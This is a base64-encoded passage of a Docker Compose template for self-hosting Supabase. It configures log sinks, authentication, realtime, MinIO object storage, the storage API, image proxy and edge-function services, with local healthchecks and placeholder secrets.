YXJzZWQgPT0gbnVsbCB7XG4gICAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSBcImluZm9cIlxuICAgICAgfVxuICAgICAgaWYgcGFyc2VkICE9IG51bGwge1xuICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IHBhcnNlZC5sZXZlbFxuICAgICAgfVxuICAgICAgaWYgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9PSBcImluZm9cIiB7XG4gICAgICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IFwibG9nXCJcbiAgICAgIH1cbiAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSB1cGNhc2UhKC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkpXG5cbnNpbmtzOlxuICBsb2dmbGFyZV9hdXRoOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gYXV0aF9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWdvdHJ1ZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3JlYWx0aW1lOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gcmVhbHRpbWVfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1yZWFsdGltZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3Jlc3Q6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByZXN0X2xvZ3NcbiAgICBlbmNvZGluZzpcbiAgICAgIGNvZGVjOiAnanNvbidcbiAgICBtZXRob2Q6ICdwb3N0J1xuICAgIHJlcXVlc3Q6XG4gICAgICByZXRyeV9tYXhfZHVyYXRpb25fc2VjczogMTBcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAvYXBpL2xvZ3M/c291cmNlX25hbWU9cG9zdGdSRVNULmxvZ3MucHJvZCZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfZGI6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSBkYl9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgIyBXZSBtdXN0IHJvdXRlIHRoZSBzaW5rIHRocm91Z2gga29uZyBiZWNhdXNlIGluZ2VzdGluZyBsb2dzIGJlZm9yZSBsb2dmbGFyZSBpcyBmdWxseSBpbml0aWFsaXNlZCB3aWxsXG4gICAgIyBsZWFkIHRvIGJyb2tlbiBxdWVyaWVzIGZyb20gc3R1ZGlvLiBUaGlzIHdvcmtzIGJ5IHRoZSBhc3N1bXB0aW9uIHRoYXQgY29udGFpbmVycyBhcmUgc3RhcnRlZCBpbiB0aGVcbiAgICAjIGZvbGxvd2luZyBvcmRlcjogdmVjdG9yID4gZGIgPiBsb2dmbGFyZSA+IGtvbmdcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2Uta29uZzo4MDAwL2FuYWx5dGljcy92MS9hcGkvbG9ncz9zb3VyY2VfbmFtZT1wb3N0Z3Jlcy5sb2dzJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9mdW5jdGlvbnM6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuZnVuY3Rpb25zXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWRlbm8tcmVsYXktbG9ncyZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfc3RvcmFnZTpcbiAgICB0eXBlOiAnaHR0cCdcbiAgICBpbnB1dHM6XG4gICAgICAtIHN0b3JhZ2VfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1zdG9yYWdlLmxvZ3MucHJvZC4yJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9rb25nOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0ga29uZ19sb2dzXG4gICAgICAtIGtvbmdfZXJyXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWNsb3VkZmxhcmUubG9ncy5wcm9kJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuIgogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jazpybycKICAgIGVudmlyb25tZW50OgogICAgICAtICdMT0dGTEFSRV9BUElfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9MT0dGTEFSRX0nCiAgICBjb21tYW5kOgogICAgICAtICctLWNvbmZpZycKICAgICAgLSBldGMvdmVjdG9yL3ZlY3Rvci55bWwKICBzdXBhYmFzZS1yZXN0OgogICAgaW1hZ2U6ICdwb3N0Z3Jlc3QvcG9zdGdyZXN0OnYxMi4yLjEyJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUEdSU1RfREJfVVJJPXBvc3RncmVzOi8vYXV0aGVudGljYXRvcjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUEdSU1RfREJfU0NIRU1BUz0ke1BHUlNUX0RCX1NDSEVNQVM6LXB1YmxpYyxzdG9yYWdlLGdyYXBocWxfcHVibGljfScKICAgICAgLSBQR1JTVF9EQl9BTk9OX1JPTEU9YW5vbgogICAgICAtICdQR1JTVF9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIFBHUlNUX0RCX1VTRV9MRUdBQ1lfR1VDUz1mYWxzZQogICAgICAtICdQR1JTVF9BUFBfU0VUVElOR1NfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnUEdSU1RfQVBQX1NFVFRJTkdTX0pXVF9FWFA9JHtKV1RfRVhQSVJZOi0zNjAwfScKICAgIGNvbW1hbmQ6IHBvc3RncmVzdAogICAgZXhjbHVkZV9mcm9tX2hjOiB0cnVlCiAgc3VwYWJhc2UtYXV0aDoKICAgIGltYWdlOiAnc3VwYWJhc2UvZ290cnVlOnYyLjE3NC4wJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5OTk5L2hlYWx0aCcKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIEdPVFJVRV9BUElfSE9TVD0wLjAuMC4wCiAgICAgIC0gR09UUlVFX0FQSV9QT1JUPTk5OTkKICAgICAgLSAnQVBJX0VYVEVSTkFMX1VSTD0ke0FQSV9FWFRFUk5BTF9VUkw6LWh0dHA6Ly9zdXBhYmFzZS1rb25nOjgwMDB9JwogICAgICAtIEdPVFJVRV9EQl9EUklWRVI9cG9zdGdyZXMKICAgICAgLSAnR09UUlVFX0RCX0RBVEFCQVNFX1VSTD1wb3N0Z3JlczovL3N1cGFiYXNlX2F1dGhfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ0dPVFJVRV9TSVRFX1VSTD0ke1NFUlZJQ0VfRlFETl9TVVBBQkFTRUtPTkd9JwogICAgICAtICdHT1RSVUVfVVJJX0FMTE9XX0xJU1Q9JHtBRERJVElPTkFMX1JFRElSRUNUX1VSTFN9JwogICAgICAtICdHT1RSVUVfRElTQUJMRV9TSUdOVVA9JHtESVNBQkxFX1NJR05VUDotZmFsc2V9JwogICAgICAtIEdPVFJVRV9KV1RfQURNSU5fUk9MRVM9c2VydmljZV9yb2xlCiAgICAgIC0gR09UUlVFX0pXVF9BVUQ9YXV0aGVudGljYXRlZAogICAgICAtIEdPVFJVRV9KV1RfREVGQVVMVF9HUk9VUF9OQU1FPWF1dGhlbnRpY2F0ZWQKICAgICAgLSAnR09UUlVFX0pXVF9FWFA9JHtKV1RfRVhQSVJZOi0zNjAwfScKICAgICAgLSAnR09UUlVFX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ0dPVFJVRV9FWFRFUk5BTF9FTUFJTF9FTkFCTEVEPSR7RU5BQkxFX0VNQUlMX1NJR05VUDotdHJ1ZX0nCiAgICAgIC0gJ0dPVFJVRV9FWFRFUk5BTF9BTk9OWU1PVVNfVVNFUlNfRU5BQkxFRD0ke0VOQUJMRV9BTk9OWU1PVVNfVVNFUlM6LWZhbHNlfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9BVVRPQ09ORklSTT0ke0VOQUJMRV9FTUFJTF9BVVRPQ09ORklSTTotZmFsc2V9JwogICAgICAtICdHT1RSVUVfU01UUF9BRE1JTl9FTUFJTD0ke1NNVFBfQURNSU5fRU1BSUx9JwogICAgICAtICdHT1RSVUVfU01UUF9IT1NUPSR7U01UUF9IT1NUfScKICAgICAgLSAnR09UUlVFX1NNVFBfUE9SVD0ke1NNVFBfUE9SVDotNTg3fScKICAgICAgLSAnR09UUlVFX1NNVFBfVVNFUj0ke1NNVFBfVVNFUn0nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX1BBU1M9JHtTTVRQX1BBU1N9JwogICAgICAtICdHT1RSVUVfU01UUF9TRU5ERVJfTkFNRT0ke1NNVFBfU0VOREVSX05BTUV9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1VSTFBBVEhTX0lOVklURT0ke01BSUxFUl9VUkxQQVRIU19JTlZJVEU6LS9hdXRoL3YxL3ZlcmlmeX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVVJMUEFUSFNfQ09ORklSTUFUSU9OPSR7TUFJTEVSX1VSTFBBVEhTX0NPTkZJUk1BVElPTjotL2F1dGgvdjEvdmVyaWZ5fScKICAgICAgLSAnR09UUlVFX01BSUxFUl9VUkxQQVRIU19SRUNPVkVSWT0ke01BSUxFUl9VUkxQQVRIU19SRUNPVkVSWTotL2F1dGgvdjEvdmVyaWZ5fScKICAgICAgLSAnR09UUlVFX01BSUxFUl9VUkxQQVRIU19FTUFJTF9DSEFOR0U9JHtNQUlMRVJfVVJMUEFUSFNfRU1BSUxfQ0hBTkdFOi0vYXV0aC92MS92ZXJpZnl9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1RFTVBMQVRFU19JTlZJVEU9JHtNQUlMRVJfVEVNUExBVEVTX0lOVklURX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVEVNUExBVEVTX0NPTkZJUk1BVElPTj0ke01BSUxFUl9URU1QTEFURVNfQ09ORklSTUFUSU9OfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfUkVDT1ZFUlk9JHtNQUlMRVJfVEVNUExBVEVTX1JFQ09WRVJZfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfTUFHSUNfTElOSz0ke01BSUxFUl9URU1QTEFURVNfTUFHSUNfTElOS30nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVEVNUExBVEVTX0VNQUlMX0NIQU5HRT0ke01BSUxFUl9URU1QTEFURVNfRU1BSUxfQ0hBTkdFfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19DT05GSVJNQVRJT049JHtNQUlMRVJfU1VCSkVDVFNfQ09ORklSTUFUSU9OfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19SRUNPVkVSWT0ke01BSUxFUl9TVUJKRUNUU19SRUNPVkVSWX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfU1VCSkVDVFNfTUFHSUNfTElOSz0ke01BSUxFUl9TVUJKRUNUU19NQUdJQ19MSU5LfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19FTUFJTF9DSEFOR0U9JHtNQUlMRVJfU1VCSkVDVFNfRU1BSUxfQ0hBTkdFfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19JTlZJVEU9JHtNQUlMRVJfU1VCSkVDVFNfSU5WSVRFfScKICAgICAgLSAnR09UUlVFX0VYVEVSTkFMX1BIT05FX0VOQUJMRUQ9JHtFTkFCTEVfUEhPTkVfU0lHTlVQOi10cnVlfScKICAgICAgLSAnR09UUlVFX1NNU19BVVRPQ09ORklSTT0ke0VOQUJMRV9QSE9ORV9BVVRPQ09ORklSTTotdHJ1ZX0nCiAgcmVhbHRpbWUtZGV2OgogICAgaW1hZ2U6ICdzdXBhYmFzZS9yZWFsdGltZTp2Mi4zNC40NycKICAgIGNvbnRhaW5lcl9uYW1lOiByZWFsdGltZS1kZXYuc3VwYWJhc2UtcmVhbHRpbWUKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctc1NmTCcKICAgICAgICAtICctLWhlYWQnCiAgICAgICAgLSAnLW8nCiAgICAgICAgLSAvZGV2L251bGwKICAgICAgICAtICctSCcKICAgICAgICAtICdBdXRob3JpemF0aW9uOiBCZWFyZXIgJHtTRVJWSUNFX1NVUEFCQVNFQU5PTl9LRVl9JwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NDAwMC9hcGkvdGVuYW50cy9yZWFsdGltZS1kZXYvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9SVD00MDAwCiAgICAgIC0gJ0RCX0hPU1Q9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdEQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gREJfVVNFUj1zdXBhYmFzZV9hZG1pbgogICAgICAtICdEQl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdEQl9OQU1FPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnREJfQUZURVJfQ09OTkVDVF9RVUVSWT1TRVQgc2VhcmNoX3BhdGggVE8gX3JlYWx0aW1lJwogICAgICAtIERCX0VOQ19LRVk9c3VwYWJhc2VyZWFsdGltZQogICAgICAtICdBUElfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSBGTFlfQUxMT0NfSUQ9Zmx5MTIzCiAgICAgIC0gRkxZX0FQUF9OQU1FPXJlYWx0aW1lCiAgICAgIC0gJ1NFQ1JFVF9LRVlfQkFTRT0ke1NFQ1JFVF9QQVNTV09SRF9SRUFMVElNRX0nCiAgICAgIC0gJ0VSTF9BRkxBR1M9LXByb3RvX2Rpc3QgaW5ldF90Y3AnCiAgICAgIC0gRU5BQkxFX1RBSUxTQ0FMRT1mYWxzZQogICAgICAtICJETlNfTk9ERVM9JyciCiAgICAgIC0gUkxJTUlUX05PRklMRT0xMDAwMAogICAgICAtIEFQUF9OQU1FPXJlYWx0aW1lCiAgICAgIC0gU0VFRF9TRUxGX0hPU1Q9dHJ1ZQogICAgICAtIExPR19MRVZFTD1lcnJvcgogICAgICAtIFJVTl9KQU5JVE9SPXRydWUKICAgICAgLSBKQU5JVE9SX0lOVEVSVkFMPTYwMDAwCiAgICBjb21tYW5kOiAic2ggLWMgXCIvYXBwL2Jpbi9taWdyYXRlICYmIC9hcHAvYmluL3JlYWx0aW1lIGV2YWwgJ1JlYWx0aW1lLlJlbGVhc2Uuc2VlZHMoUmVhbHRpbWUuUmVwbyknICYmIC9hcHAvYmluL3NlcnZlclwiXG4iCiAgc3VwYWJhc2UtbWluaW86CiAgICBpbWFnZTogJ2doY3IuaW8vY29vbGxhYnNpby9taW5pbzpSRUxFQVNFLjIwMjUtMTAtMTVUMTctMjktNTVaJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01JTklPX1JPT1RfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NSU5JT30nCiAgICAgIC0gJ01JTklPX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01JTklPfScKICAgIGNvbW1hbmQ6ICdzZXJ2ZXIgLS1jb25zb2xlLWFkZHJlc3MgIjo5MDAxIiAvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBtYwogICAgICAgIC0gcmVhZHkKICAgICAgICAtIGxvY2FsCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgIHZvbHVtZXM6CiAgICAgIC0gJy4vdm9sdW1lcy9zdG9yYWdlOi9kYXRhJwogIG1pbmlvLWNyZWF0ZWJ1Y2tldDoKICAgIGltYWdlOiBtaW5pby9tYwogICAgcmVzdGFydDogJ25vJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01JTklPX1JPT1RfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NSU5JT30nCiAgICAgIC0gJ01JTklPX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01JTklPfScKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLW1pbmlvOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnRyeXBvaW50OgogICAgICAtIC9lbnRyeXBvaW50LnNoCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9lbnRyeXBvaW50LnNoCiAgICAgICAgdGFyZ2V0OiAvZW50cnlwb2ludC5zaAogICAgICAgIGNvbnRlbnQ6ICIjIS9iaW4vc2hcbi91c3IvYmluL21jIGFsaWFzIHNldCBzdXBhYmFzZS1taW5pbyBodHRwOi8vc3VwYWJhc2UtbWluaW86OTAwMCAke01JTklPX1JPT1RfVVNFUn0gJHtNSU5JT19ST09UX1BBU1NXT1JEfTtcbi91c3IvYmluL21jIG1iIC0taWdub3JlLWV4aXN0aW5nIHN1cGFiYXNlLW1pbmlvL3N0dWI7XG5leGl0IDBcbiIKICBzdXBhYmFzZS1zdG9yYWdlOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9zdG9yYWdlLWFwaTp2MS4xNC42JwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtcmVzdDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2Vfc3RhcnRlZAogICAgICBpbWdwcm94eToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2Vfc3RhcnRlZAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctLW5vLXZlcmJvc2UnCiAgICAgICAgLSAnLS10cmllcz0xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NTAwMC9zdGF0dXMnCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIGludGVydmFsOiA1cwogICAgICByZXRyaWVzOiAzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWRVJfUE9SVD01MDAwCiAgICAgIC0gU0VSVkVSX1JFR0lPTj1sb2NhbAogICAgICAtIE1VTFRJX1RFTkFOVD1mYWxzZQogICAgICAtICdBVVRIX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ0RBVEFCQVNFX1VSTD1wb3N0Z3JlczovL3N1cGFiYXNlX3N0b3JhZ2VfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gREJfSU5TVEFMTF9ST0xFUz1mYWxzZQogICAgICAtIFNUT1JBR0VfQkFDS0VORD1zMwogICAgICAtIFNUT1JBR0VfUzNfQlVDS0VUPXN0dWIKICAgICAgLSAnU1RPUkFHRV9TM19FTkRQT0lOVD1odHRwOi8vc3VwYWJhc2UtbWluaW86OTAwMCcKICAgICAgLSBTVE9SQUdFX1MzX0ZPUkNFX1BBVEhfU1RZTEU9dHJ1ZQogICAgICAtIFNUT1JBR0VfUzNfUkVHSU9OPXVzLWVhc3QtMQogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke1NFUlZJQ0VfVVNFUl9NSU5JT30nCiAgICAgIC0gJ0FXU19TRUNSRVRfQUNDRVNTX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfTUlOSU99JwogICAgICAtIFVQTE9BRF9GSUxFX1NJWkVfTElNSVQ9NTI0Mjg4MDAwCiAgICAgIC0gVVBMT0FEX0ZJTEVfU0laRV9MSU1JVF9TVEFOREFSRD01MjQyODgwMDAKICAgICAgLSBVUExPQURfU0lHTkVEX1VSTF9FWFBJUkFUSU9OX1RJTUU9MTIwCiAgICAgIC0gVFVTX1VSTF9QQVRIPXVwbG9hZC9yZXN1bWFibGUKICAgICAgLSBUVVNfTUFYX1NJWkU9MzYwMDAwMAogICAgICAtIEVOQUJMRV9JTUFHRV9UUkFOU0ZPUk1BVElPTj10cnVlCiAgICAgIC0gJ0lNR1BST1hZX1VSTD1odHRwOi8vaW1ncHJveHk6ODA4MCcKICAgICAgLSBJTUdQUk9YWV9SRVFVRVNUX1RJTUVPVVQ9MTUKICAgICAgLSBEQVRBQkFTRV9TRUFSQ0hfUEFUSD1zdG9yYWdlCiAgICAgIC0gTk9ERV9FTlY9cHJvZHVjdGlvbgogICAgICAtIFJFUVVFU1RfQUxMT1dfWF9GT1JXQVJERURfUEFUSD10cnVlCiAgICB2b2x1bWVzOgogICAgICAtICcuL3ZvbHVtZXMvc3RvcmFnZTovdmFyL2xpYi9zdG9yYWdlJwogIGltZ3Byb3h5OgogICAgaW1hZ2U6ICdkYXJ0aHNpbS9pbWdwcm94eTp2My44LjAnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gaW1ncHJveHkKICAgICAgICAtIGhlYWx0aAogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSU1HUFJPWFlfTE9DQUxfRklMRVNZU1RFTV9ST09UPS8KICAgICAgLSBJTUdQUk9YWV9VU0VfRVRBRz10cnVlCiAgICAgIC0gJ0lNR1BST1hZX0VOQUJMRV9XRUJQX0RFVEVDVElPTj0ke0lNR1BST1hZX0VOQUJMRV9XRUJQX0RFVEVDVElPTjotdHJ1ZX0nCiAgICB2b2x1bWVzOgogICAgICAtICcuL3ZvbHVtZXMvc3RvcmFnZTovdmFyL2xpYi9zdG9yYWdlJwogIHN1cGFiYXNlLW1ldGE6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3Bvc3RncmVzLW1ldGE6djAuODkuMycKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUEdfTUVUQV9QT1JUPTgwODAKICAgICAgLSAnUEdfTUVUQV9EQl9IT1NUPSR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifScKICAgICAgLSAnUEdfTUVUQV9EQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BHX01FVEFfREJfTkFNRT0ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gUEdfTUVUQV9EQl9VU0VSPXN1cGFiYXNlX2FkbWluCiAgICAgIC0gJ1BHX01FVEFfREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICBzdXBhYmFzZS1lZGdlLWZ1bmN0aW9uczoKICAgIGltYWdlOiAnc3VwYWJhc2UvZWRnZS1ydW50aW1lOnYxLjY3LjQnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSAnRWRnZSBGdW5jdGlvbnMgaXMgaGVhbHRoeScKICAgICAgdGltZW91dDogNXMKICAgICAga